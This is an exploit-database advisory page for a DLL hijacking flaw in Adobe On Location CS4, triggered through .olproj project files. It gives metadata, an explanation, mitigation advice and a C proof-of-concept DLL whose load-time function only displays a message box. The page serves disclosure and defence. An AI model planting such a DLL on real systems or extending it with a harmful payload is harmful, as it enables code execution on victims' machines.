Adobe On Location CS4 DLL Hijacking Exploit (ibfs32.dll)

vendor:

On Location CS4

by:

Glafkos Charalambous

7,8

CVSS

HIGH

DLL Hijacking

427

CWE

Product Name: On Location CS4

Affected Version From: CS4 Build 315

Affected Version To: CS4 Build 315

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 7 x64 Ultimate

2010

Adobe On Location CS4 DLL Hijacking Exploit (ibfs32.dll)

This exploit is related to Adobe On Location CS4 DLL Hijacking vulnerability. It is a type of vulnerability that occurs when an application looks for a specific DLL to perform a certain task, but an attacker provides a malicious DLL instead. This malicious DLL is then executed instead of the legitimate DLL, allowing the attacker to gain control of the application. The vulnerable extension in this exploit is .olproj.

Mitigation:

The best way to mitigate DLL hijacking is to ensure that the application is not looking for DLLs in the current working directory. The application should be configured to look for DLLs in the system directory or in the directory of the application itself.

Source

Exploit-DB raw data:

/* 
Exploit Title: Adobe On Location CS4 DLL Hijacking Exploit (ibfs32.dll)
Date: August 25, 2010
Author: Glafkos Charalambous (glafkos[@]astalavista[dot]com)
Version: CS4 Build 315
Tested on: Windows 7 x64 Ultimate
Vulnerable extensions: .olproj
Greetz: Astalavista, OffSEC, Exploit-DB
*/


#include <windows.h>

BOOL WINAPI DllMain (
            HANDLE    hinstDLL,
            DWORD     fdwReason,
            LPVOID    lpvReserved)
{
    switch (fdwReason)
	{
	case DLL_PROCESS_ATTACH:
		dll_hijack();
	case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
	break;
	}
	return TRUE;
}

int dll_hijack()
{
  MessageBox(0, "Adobe DLL Hijacking!", "DLL Message", MB_OK);
}